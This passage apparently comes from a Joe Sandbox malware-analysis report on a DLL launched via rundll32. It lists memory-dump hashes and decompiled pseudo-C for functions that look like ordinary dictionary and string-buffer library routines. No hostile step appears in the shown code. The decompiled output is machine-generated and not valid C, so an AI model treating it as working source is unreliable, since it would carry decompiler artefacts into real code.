                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strlen$strchrstrncmp
                                                                      • String ID: -
                                                                      • API String ID: 2264528763-2547889144
                                                                      • Opcode ID: f0f04a066c244188fbca6ac71b0a1930aa93ce774d345eeea5f276fcbf092cf4
                                                                      • Instruction ID: 5f1f2dd0eab5bc6f8befd7c2bb33942bdc2d6399c7dfe7216c1ccb09edde324b
                                                                      • Opcode Fuzzy Hash: f0f04a066c244188fbca6ac71b0a1930aa93ce774d345eeea5f276fcbf092cf4
                                                                      • Instruction Fuzzy Hash: 6F318075A0C3558FEB50DA78949026EBBE1FF893C4F05492DF9C8D7245D278D9068B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_freep$mv_mallocz
                                                                      • String ID:
                                                                      • API String ID: 2455733640-0
                                                                      • Opcode ID: 57be5cbf1da16da54839bca519b4bd6de1be08dc8cda019c43820ae6256fb6b0
                                                                      • Instruction ID: 3b99154a913b274524c08becb6f728f5f8244ec0eeb4226c169e02ad570783d9
                                                                      • Opcode Fuzzy Hash: 57be5cbf1da16da54839bca519b4bd6de1be08dc8cda019c43820ae6256fb6b0
                                                                      • Instruction Fuzzy Hash: 1131B074908B01CFD760DF25C581A1AB7F0FF89391B568A5DEC999B319D730E881CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 20%
                                                                      			E10012049(signed int __ebx, void* __ecx, void* __edx) {
                                                                      				signed int* _t142;
                                                                      				void* _t152;
                                                                      				void* _t154;
                                                                      				signed int* _t155;
                                                                      				int _t157;
                                                                      				signed int _t159;
                                                                      				signed int _t165;
                                                                      				int _t173;
                                                                      				void* _t175;
                                                                      				void* _t178;
                                                                      				signed int _t179;
                                                                      				void** _t180;
                                                                      				void* _t183;
                                                                      				signed int _t190;
                                                                      				void** _t191;
                                                                      				void* _t192;
                                                                      				signed char _t195;
                                                                      				void* _t208;
                                                                      				void* _t210;
                                                                      				void* _t212;
                                                                      				void* _t213;
                                                                      				void* _t214;
                                                                      				void* _t215;
                                                                      				void* _t217;
                                                                      				signed int _t221;
                                                                      				int _t223;
                                                                      				void* _t224;
                                                                      				void* _t230;
                                                                      				void* _t232;
                                                                      				int _t234;
                                                                      				int _t236;
                                                                      				void* _t237;
                                                                      				void* _t239;
                                                                      				void* _t241;
                                                                      				signed int* _t243;
                                                                      				void** _t246;
                                                                      
                                                                      				_t210 = __edx;
                                                                      				_t179 = __ebx;
                                                                      				while(1) {
                                                                      					L42:
                                                                      					 *_t246 = _t192;
                                                                      					_t246[0x19] = _t210;
                                                                      					_t246[9] = _t192;
                                                                      					_t236 = strlen(??);
                                                                      					 *_t246 = _t246[8];
                                                                      					_t173 = strlen(??);
                                                                      					 *_t246 = _t246[9];
                                                                      					_t223 = _t173;
                                                                      					_t84 = _t173 + 1; // 0x1
                                                                      					_t246[1] = _t236 + _t84;
                                                                      					_t175 = L10028DA0();
                                                                      					if(_t175 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t86 = _t223 + 1; // 0x1
                                                                      					_t246[8] = _t86;
                                                                      					_t214 = _t175 + _t236;
                                                                      					_t237 = _t246[0xf];
                                                                      					_t195 = _t214;
                                                                      					_t246[0xb] = _t214;
                                                                      					_t246[9] = _t214;
                                                                      					_t215 = _t246[0x19];
                                                                      					_t246[0xa] = _t237;
                                                                      					if(_t246[8] >= 8) {
                                                                      						if((_t195 & 0x00000001) != 0) {
                                                                      							 *(_t246[0xb]) =  *_t237 & 0x000000ff;
                                                                      							_t246[8] = _t223;
                                                                      							_t246[9] = _t246[9] + 1;
                                                                      							_t246[0xa] = _t246[0xa] + 1;
                                                                      						}
                                                                      						if((_t246[9] & 0x00000002) != 0) {
                                                                      							_t239 = _t246[0xa];
                                                                      							_t224 = _t246[9];
                                                                      							 *_t224 =  *_t239 & 0x0000ffff;
                                                                      							_t246[9] = _t224 + 2;
                                                                      							_t246[8] = _t246[8] - 2;
                                                                      							_t246[0xa] = _t239 + 2;
                                                                      						}
                                                                      						if((_t246[9] & 0x00000004) != 0) {
                                                                      							_t241 = _t246[0xa];
                                                                      							_t208 = _t246[9] + 4;
                                                                      							 *(_t208 - 4) =  *_t241;
                                                                      							_t246[9] = _t208;
                                                                      							_t246[8] = _t246[8] - 4;
                                                                      							_t246[0xa] = _t241 + 4;
                                                                      						}
                                                                      					}
                                                                      					_t246[0x19] = _t215;
                                                                      					_t246[0xb] = _t175;
                                                                      					memcpy(_t246[9], _t246[0xa], _t246[8]);
                                                                      					_t246 =  &(_t246[3]);
                                                                      					 *_t246 =  &(_t246[0xf]);
                                                                      					E100290E0();
                                                                      					_t212 = _t246[0x19];
                                                                      					_t246[0xf] = _t246[0xb];
                                                                      					goto L18;
                                                                      					while(1) {
                                                                      						L19:
                                                                      						_t234 = _t246[0xf];
                                                                      						if(_t234 == 0) {
                                                                      							goto L39;
                                                                      						}
                                                                      						L20:
                                                                      						_t191 = _t190 + _t159 * 8;
                                                                      						_t191[1] = _t234;
                                                                      						 *_t191 = _t246[0xe];
                                                                      						 *_t243 = _t159 + 1;
                                                                      						while(1) {
                                                                      							L21:
                                                                      							_t179 = (_t180 -  *((intOrPtr*)(_t210 + 4)) >> 3) + 1;
                                                                      							if( *_t210 <= _t179) {
                                                                      								break;
                                                                      							}
                                                                      							_t180 =  *((intOrPtr*)(_t210 + 4)) + _t179 * 8;
                                                                      							if(_t180 == 0) {
                                                                      								break;
                                                                      							} else {
                                                                      								_t230 =  *_t180;
                                                                      								_t246[0xe] = 0;
                                                                      								_t217 = _t180[1];
                                                                      								_t243 =  *(_t246[0x18]);
                                                                      								_t246[0xf] = 0;
                                                                      								if(_t246[5] == 0) {
                                                                      									if(_t217 == 0) {
                                                                      										goto L4;
                                                                      									} else {
                                                                      										 *_t246 = _t217;
                                                                      										_t246[0x19] = _t210;
                                                                      										_t178 = E100292E0(_t180, _t217, _t230, _t243);
                                                                      										_t210 = _t246[0x19];
                                                                      										_t246[0xf] = _t178;
                                                                      										if(_t230 != 0) {
                                                                      											goto L5;
                                                                      										} else {
                                                                      											goto L25;
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									_t246[0xf] = _t217;
                                                                      									L4:
                                                                      									if(_t230 == 0) {
                                                                      										L25:
                                                                      										_t142 = _t243;
                                                                      										_t183 = 0xffffffea;
                                                                      										goto L26;
                                                                      									} else {
                                                                      										L5:
                                                                      										_t246[4] = 0;
                                                                      										if(_t246[6] == 0) {
                                                                      											_t246[1] = _t230;
                                                                      											 *_t246 = _t243;
                                                                      											_t246[0x19] = _t210;
                                                                      											_t246[3] = _t246[0x1a];
                                                                      											_t246[2] = 0;
                                                                      											_t152 = E100110D0();
                                                                      											_t210 = _t246[0x19];
                                                                      											_t246[4] = _t152;
                                                                      										}
                                                                      										if(_t246[7] == 0) {
                                                                      											 *_t246 = _t230;
                                                                      											_t246[0x19] = _t210;
                                                                      											_t154 = E100292E0(_t180, _t217, _t230, _t243);
                                                                      											_t210 = _t246[0x19];
                                                                      											_t246[0xe] = _t154;
                                                                      											_t232 = _t154;
                                                                      											if(_t243 == 0) {
                                                                      												goto L33;
                                                                      											} else {
                                                                      												if(_t154 == 0) {
                                                                      													goto L10;
                                                                      												} else {
                                                                      													goto L8;
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											_t246[0xe] = _t230;
                                                                      											if(_t243 == 0) {
                                                                      												L33:
                                                                      												 *_t246 = 8;
                                                                      												_t246[0x19] = _t210;
                                                                      												_t155 = E10029100();
                                                                      												_t232 = _t246[0xe];
                                                                      												_t243 = _t155;
                                                                      												 *(_t246[0x18]) = _t243;
                                                                      												if(_t243 == 0) {
                                                                      													L35:
                                                                      													_t142 = _t243;
                                                                      													_t183 = 0xfffffff4;
                                                                      													L26:
                                                                      													if(_t142 != 0) {
                                                                      														L11:
                                                                      														if( *_t142 == 0) {
                                                                      															 *_t246 =  &(_t142[1]);
                                                                      															E100290E0();
                                                                      															 *_t246 = _t246[0x18];
                                                                      															E100290E0();
                                                                      														}
                                                                      													}
                                                                      													 *_t246 = _t246[0xe];
                                                                      													L100290D0();
                                                                      													 *_t246 = _t246[0xf];
                                                                      													L100290D0();
                                                                      													return _t183;
                                                                      												} else {
                                                                      													_t210 = _t246[0x19];
                                                                      													if(_t232 != 0) {
                                                                      														goto L8;
                                                                      													} else {
                                                                      														goto L35;
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												L8:
                                                                      												_t157 = _t246[0xf];
                                                                      												_t246[8] = _t157;
                                                                      												if(_t217 == 0 || _t157 != 0) {
                                                                      													if(_t246[4] == 0) {
                                                                      														_t159 =  *_t243;
                                                                      														if(_t246[8] == 0) {
                                                                      															goto L39;
                                                                      														} else {
                                                                      															_t246[0x19] = _t210;
                                                                      															_t246[2] = 8;
                                                                      															_t246[1] = _t159 + 1;
                                                                      															 *_t246 = _t243[1];
                                                                      															_t165 = E10029010();
                                                                      															_t210 = _t246[0x19];
                                                                      															_t190 = _t165;
                                                                      															if(_t165 == 0) {
                                                                      																goto L10;
                                                                      															} else {
                                                                      																_t243[1] = _t165;
                                                                      																_t159 =  *_t243;
                                                                      																goto L19;
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														if((_t246[0x1a] & 0x00000010) != 0) {
                                                                      															 *_t246 = _t232;
                                                                      															_t246[0x19] = _t210;
                                                                      															L100290D0();
                                                                      															 *_t246 = _t246[0xf];
                                                                      															L100290D0();
                                                                      															_t210 = _t246[0x19];
                                                                      															continue;
                                                                      														} else {
                                                                      															_t192 =  *(_t246[4] + 4);
                                                                      															if(_t246[8] == 0 || (_t246[0x1a] & 0x00000020) == 0) {
                                                                      																 *_t246 = _t192;
                                                                      																_t246[0x19] = _t210;
                                                                      																L100290D0();
                                                                      																_t212 = _t246[0x19];
                                                                      																L18:
                                                                      																_t246[0x19] = _t212;
                                                                      																 *_t246 =  *(_t246[4]);
                                                                      																L100290D0();
                                                                      																_t221 =  *_t243;
                                                                      																_t190 = _t243[1];
                                                                      																_t213 = _t246[4];
                                                                      																_t34 = _t221 - 1; // 0x3
                                                                      																_t159 = _t34;
                                                                      																 *_t243 = _t159;
                                                                      																 *_t213 =  *(_t190 + _t159 * 8);
                                                                      																 *((intOrPtr*)(_t213 + 4)) =  *((intOrPtr*)(_t190 + 4 + _t159 * 8));
                                                                      																_t210 = _t246[0x19];
                                                                      																L19:
                                                                      																_t234 = _t246[0xf];
                                                                      																if(_t234 == 0) {
                                                                      																	goto L39;
                                                                      																}
                                                                      																continue;
                                                                      															} else {
                                                                      																goto L42;
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													goto L10;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							L52:
                                                                      						}
                                                                      						return 0;
                                                                      						goto L52;
                                                                      						L39:
                                                                      						if(_t159 == 0) {
                                                                      							_t246[0x19] = _t210;
                                                                      							 *_t246 =  &(_t243[1]);
                                                                      							E100290E0();
                                                                      							 *_t246 = _t246[0x18];
                                                                      							E100290E0();
                                                                      							_t210 = _t246[0x19];
                                                                      						}
                                                                      						_t246[0x19] = _t210;
                                                                      						 *_t246 =  &(_t246[0xe]);
                                                                      						E100290E0();
                                                                      						_t210 = _t246[0x19];
                                                                      						goto L21;
                                                                      					}
                                                                      				}
                                                                      				L10:
                                                                      				_t142 = _t243;
                                                                      				_t183 = 0xfffffff4;
                                                                      				goto L11;
                                                                      			}

                                                                      0x10012129
                                                                      0x100120b3
                                                                      0x100120bb
                                                                      0x100120c7
                                                                      0x100120c7
                                                                      0x100120cd
                                                                      0x100120d0
                                                                      0x100120d9
                                                                      0x100120dd
                                                                      0x100120e1
                                                                      0x10011e83
                                                                      0x10011e83
                                                                      0x10011e83
                                                                      0x10011e89
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10011e8f
                                                                      0x10011e93
                                                                      0x10011e97
                                                                      0x10011e9a
                                                                      0x10011e9c
                                                                      0x10011e9f
                                                                      0x10011e9f
                                                                      0x10011ea7
                                                                      0x10011eaa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10011d63
                                                                      0x10011d68
                                                                      0x00000000
                                                                      0x10011d6e
                                                                      0x10011d74
                                                                      0x10011d76
                                                                      0x10011d7a
                                                                      0x10011d7d
                                                                      0x10011d81
                                                                      0x10011d8b
                                                                      0x10011ec2
                                                                      0x00000000
                                                                      0x10011ec8
                                                                      0x10011ec8
                                                                      0x10011ecb
                                                                      0x10011ecf
                                                                      0x10011ed6
                                                                      0x10011eda
                                                                      0x10011ede
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10011ede
                                                                      0x10011d91
                                                                      0x10011d91
                                                                      0x10011d95
                                                                      0x10011d97
                                                                      0x10011ee4
                                                                      0x10011ee4
                                                                      0x10011ee6
                                                                      0x00000000
                                                                      0x10011d9d
                                                                      0x10011d9d
                                                                      0x10011d9f
                                                                      0x10011da9
                                                                      0x10011f30
                                                                      0x10011f38
                                                                      0x10011f3b
                                                                      0x10011f3f
                                                                      0x10011f45
                                                                      0x10011f49
                                                                      0x10011f4e
                                                                      0x10011f52
                                                                      0x10011f52
                                                                      0x10011db5
                                                                      0x10011f00
                                                                      0x10011f03
                                                                      0x10011f07
                                                                      0x10011f0e
                                                                      0x10011f12
                                                                      0x10011f16
                                                                      0x10011f18
                                                                      0x00000000
                                                                      0x10011f1a
                                                                      0x10011f1c
                                                                      0x00000000
                                                                      0x10011f22
                                                                      0x00000000
                                                                      0x10011f22
                                                                      0x10011f1c
                                                                      0x10011dbb
                                                                      0x10011dbb
                                                                      0x10011dc1
                                                                      0x10011f80
                                                                      0x10011f80
                                                                      0x10011f87
                                                                      0x10011f8b
                                                                      0x10011f90
                                                                      0x10011f94
                                                                      0x10011f9c
                                                                      0x10011f9e
                                                                      0x10011fac
                                                                      0x10011fac
                                                                      0x10011fae
                                                                      0x10011eeb
                                                                      0x10011eed
                                                                      0x10011dde
                                                                      0x10011de2
                                                                      0x10011f63
                                                                      0x10011f66
                                                                      0x10011f6f
                                                                      0x10011f72
                                                                      0x10011f72
                                                                      0x10011de2
                                                                      0x10011dec
                                                                      0x10011def
                                                                      0x10011df8
                                                                      0x10011dfb
                                                                      0x10011e09
                                                                      0x10011fa0
                                                                      0x10011fa2
                                                                      0x10011fa6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10011fa6
                                                                      0x10011dc7
                                                                      0x10011dc7
                                                                      0x10011dc7
                                                                      0x10011dcd
                                                                      0x10011dd1
                                                                      0x10011e16
                                                                      0x10011fc4
                                                                      0x10011fc9
                                                                      0x00000000
                                                                      0x10011fcb
                                                                      0x10011fcb
                                                                      0x10011fd5
                                                                      0x10011fd9
                                                                      0x10011fe0
                                                                      0x10011fe3
                                                                      0x10011fe8
                                                                      0x10011fee
                                                                      0x10011ff0
                                                                      0x00000000
                                                                      0x10011ff6
                                                                      0x10011ff6
                                                                      0x10011ff9
                                                                      0x00000000
                                                                      0x10011ff9
                                                                      0x10011ff0
                                                                      0x10011e1c
                                                                      0x10011e21
                                                                      0x100120f0
                                                                      0x100120f3
                                                                      0x100120f7
                                                                      0x10012100
                                                                      0x10012103
                                                                      0x10012108
                                                                      0x00000000
                                                                      0x10011e27
                                                                      0x10011e31
                                                                      0x10011e34
                                                                      0x10011e41
                                                                      0x10011e44
                                                                      0x10011e48
                                                                      0x10011e4d
                                                                      0x10011e51
                                                                      0x10011e51
                                                                      0x10011e5b
                                                                      0x10011e5e
                                                                      0x10011e63
                                                                      0x10011e66
                                                                      0x10011e69
                                                                      0x10011e6d
                                                                      0x10011e6d
                                                                      0x10011e70
                                                                      0x10011e7a
                                                                      0x10011e7c
                                                                      0x10011e7f
                                                                      0x10011e83
                                                                      0x10011e83
                                                                      0x10011e89
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10011e34
                                                                      0x10011e21
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10011dd1
                                                                      0x10011dc1
                                                                      0x10011db5
                                                                      0x10011d97
                                                                      0x10011d8b
                                                                      0x00000000
                                                                      0x10011d68
                                                                      0x10011ebb
                                                                      0x00000000
                                                                      0x10012008
                                                                      0x1001200a
                                                                      0x10012028
                                                                      0x1001202f
                                                                      0x10012032
                                                                      0x1001203b
                                                                      0x1001203e
                                                                      0x10012043
                                                                      0x10012043
                                                                      0x1001200c
                                                                      0x10012014
                                                                      0x10012017
                                                                      0x1001201c
                                                                      0x00000000
                                                                      0x1001201c
                                                                      0x10011e83
                                                                      0x10011dd7
                                                                      0x10011dd7
                                                                      0x10011dd9
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strlen$_aligned_reallocmv_freepmv_realloc
                                                                      • String ID:
                                                                      • API String ID: 895301365-0
                                                                      • Opcode ID: 76a04085e64d47384e2e2ce00772daf36afdae989b4b3b42e904556264258d40
                                                                      • Instruction ID: 9bf475a18fd4cb1c0505352b53a299a598f586f68b75c8a149e966f8cd1839f1
                                                                      • Opcode Fuzzy Hash: 76a04085e64d47384e2e2ce00772daf36afdae989b4b3b42e904556264258d40
                                                                      • Instruction Fuzzy Hash: 0031CDB99087058FC744CF29C18045AFBE1FF88718F558A6EE889AB310D731EA45CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ExclusiveLock$AcquireReleasemv_freep
                                                                      • String ID:
                                                                      • API String ID: 2444013405-0
                                                                      • Opcode ID: d869766378f18830eaedbb65d13c15c11a69b80f9d160b7f9c0174b365de840b
                                                                      • Instruction ID: c3c698d3df7831113588d9bdc2aa75e8a835319d0c3e7d0db2d9c6c4417e318c
                                                                      • Opcode Fuzzy Hash: d869766378f18830eaedbb65d13c15c11a69b80f9d160b7f9c0174b365de840b
                                                                      • Instruction Fuzzy Hash: 7B21D6B5608701CFD700EF25D5C491ABBF4EF85280F06C969E8898B31AD731E885CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 18%
                                                                      			E10012239(intOrPtr __edi, intOrPtr* __esi, char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a40, char _a44, char _a61, char _a64, intOrPtr* _a1120, intOrPtr _a1124) {
                                                                      				signed int _t34;
                                                                      				char* _t49;
                                                                      				intOrPtr* _t51;
                                                                      				intOrPtr _t56;
                                                                      				void* _t57;
                                                                      				intOrPtr* _t60;
                                                                      				char* _t64;
                                                                      				intOrPtr* _t66;
                                                                      
                                                                      				_t60 = __esi;
                                                                      				_t56 = __edi;
                                                                      				_a8 = 0xffffffff;
                                                                      				_t49 =  &_a64;
                                                                      				_a4 = 0x40;
                                                                      				_t64 =  &_a61;
                                                                      				 *_t66 = _t49;
                                                                      				L10008880(_t49, __edi, __esi, _t64);
                                                                      				_t34 = 0;
                                                                      				_t51 = _t60;
                                                                      				_a1124 = _t56;
                                                                      				_t57 = 0;
                                                                      				if( *_t51 > 0) {
                                                                      					while(1) {
                                                                      						_t60 =  *((intOrPtr*)(_t51 + 4)) + _t34 * 8;
                                                                      						if(_t60 == 0) {
                                                                      							goto L5;
                                                                      						}
                                                                      						if(_t57 != 0) {
                                                                      							 *_t66 = _t49;
                                                                      							_a8 = 1;
                                                                      							_a4 =  &_a40;
                                                                      							_a1120 = _t51;
                                                                      							L10008F30();
                                                                      							_t51 = _a1120;
                                                                      						}
                                                                      						_a8 = _t64;
                                                                      						_a12 = 1;
                                                                      						_t57 = _t57 + 1;
                                                                      						_a16 = 0;
                                                                      						_a1120 = _t51;
                                                                      						 *_t66 = _t49;
                                                                      						_a4 =  *_t60;
                                                                      						L10009730();
                                                                      						_a8 = 1;
                                                                      						_a4 =  &_a44;
                                                                      						 *_t66 = _t49;
                                                                      						L10008F30();
                                                                      						_a16 = 0;
                                                                      						_a12 = 1;
                                                                      						_a8 = _t64;
                                                                      						 *_t66 = _t49;
                                                                      						_a4 =  *((intOrPtr*)(_t60 + 4));
                                                                      						L10009730();
                                                                      						_t51 = _a1120;
                                                                      						_t34 = _t60 + 1;
                                                                      						if( *_t51 > _t34) {
                                                                      							continue;
                                                                      						}
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      				L5:
                                                                      				 *_t66 = _t49;
                                                                      				_a4 = _a1124;
                                                                      				return E10009690(_t49, _t51, _a1124, _t60);
                                                                      			}












                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprint_init
                                                                      • String ID:
                                                                      • API String ID: 3283265872-0
                                                                      • Opcode ID: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
                                                                      • Instruction ID: 90910876c942d1fbafe524e13dc9732c176e9ecd8d18a9c8de127334b5e1fd1f
                                                                      • Opcode Fuzzy Hash: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
                                                                      • Instruction Fuzzy Hash: 6121DDB59197059FC350DF28C18025AFBE1FF88354F51892EE99D87351E736E982CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 42%
                                                                      			E10011483(void* __eax, intOrPtr* __ebx, void* __ecx, void* __eflags) {
                                                                      				intOrPtr* _t60;
                                                                      
                                                                      				 *__esp = __eax;
                                                                      				__edi = __eax;
                                                                      				__esp[7] = __ecx;
                                                                      				__eax = strlen(??);
                                                                      				__ecx = __esp[7];
                                                                      				 *__esp = __esp[7];
                                                                      				__esi = __eax;
                                                                      				__eax = strlen(??);
                                                                      				 *__esp = __edi;
                                                                      				__edx = __eax;
                                                                      				__esp[7] = __eax;
                                                                      				_t26 = __eax + 1; // 0x1
                                                                      				__eax = __esi + _t26;
                                                                      				__esp[1] = __esi + _t26;
                                                                      				__eax = L10028DA0();
                                                                      				if(__eax != 0) {
                                                                      					__edx = __esp[7];
                                                                      					__edi = __eax + __esi;
                                                                      					__esi = __esp[0xb];
                                                                      					__ecx = __edx + 1;
                                                                      					if(__ecx >= 8) {
                                                                      						if((__edi & 0x00000001) != 0) {
                                                                      							__ecx =  *__esi & 0x000000ff;
                                                                      							__edi = __edi + 1;
                                                                      							__esi = __esi + 1;
                                                                      							 *((char*)(__edi - 1)) = __cl;
                                                                      							__ecx = __edx;
                                                                      						}
                                                                      						if((__edi & 0x00000002) != 0) {
                                                                      							__edx =  *__esi & 0x0000ffff;
                                                                      							__edi = __edi + 2;
                                                                      							__esi = __esi + 2;
                                                                      							__ecx = __ecx - 2;
                                                                      							 *((short*)(__edi - 2)) = __dx;
                                                                      						}
                                                                      						if((__edi & 0x00000004) != 0) {
                                                                      							__edx =  *__esi;
                                                                      							__edi = __edi + 4;
                                                                      							__esi = __esi + 4;
                                                                      							__ecx = __ecx - 4;
                                                                      							 *(__edi - 4) = __edx;
                                                                      						}
                                                                      					}
                                                                      					__esp[7] = __eax;
                                                                      					__edx =  &(__esp[0xb]);
                                                                      					__eax = memcpy(__edi, __esi, __ecx);
                                                                      					__esi + __ecx = __esi + __ecx + __ecx;
                                                                      					__ecx = 0;
                                                                      					E100290E0(__edx);
                                                                      					__eax = __esp[7];
                                                                      					__esp[0xb] = __esp[7];
                                                                      					__eax =  *__ebp;
                                                                      					 *__esp =  *__ebp;
                                                                      					L100290D0();
                                                                      					__eax =  *__ebx;
                                                                      					__ecx = __ebx[1];
                                                                      					_t8 = __eax - 1; // -1
                                                                      					__esi = _t8;
                                                                      					 *__ebx = __esi;
                                                                      					__eax =  *(__ecx + __esi * 8);
                                                                      					__edx =  *(__ecx + 4 + __esi * 8);
                                                                      					 *__ebp =  *(__ecx + __esi * 8);
                                                                      					__ebp[1] =  *(__ecx + 4 + __esi * 8);
                                                                      					__eax = __esp[0xb];
                                                                      					if(__eax == 0) {
                                                                      						if(__esi == 0) {
                                                                      							E100290E0(__ebx);
                                                                      							__eax = __esp[0x14];
                                                                      							E100290E0(__esp[0x14]);
                                                                      						}
                                                                      						__eax =  &(__esp[0xa]);
                                                                      						__esi = 0;
                                                                      						E100290E0( &(__esp[0xa]));
                                                                      						goto L4;
                                                                      					} else {
                                                                      						__edx = __ecx + __esi * 8;
                                                                      						__ecx = __esp[0xa];
                                                                      						__esi = __esi + 1;
                                                                      						 *(__edx + 4) = __eax;
                                                                      						 *__edx = __esp[0xa];
                                                                      						 *__ebx = __esi;
                                                                      						__esi = 0;
                                                                      						L4:
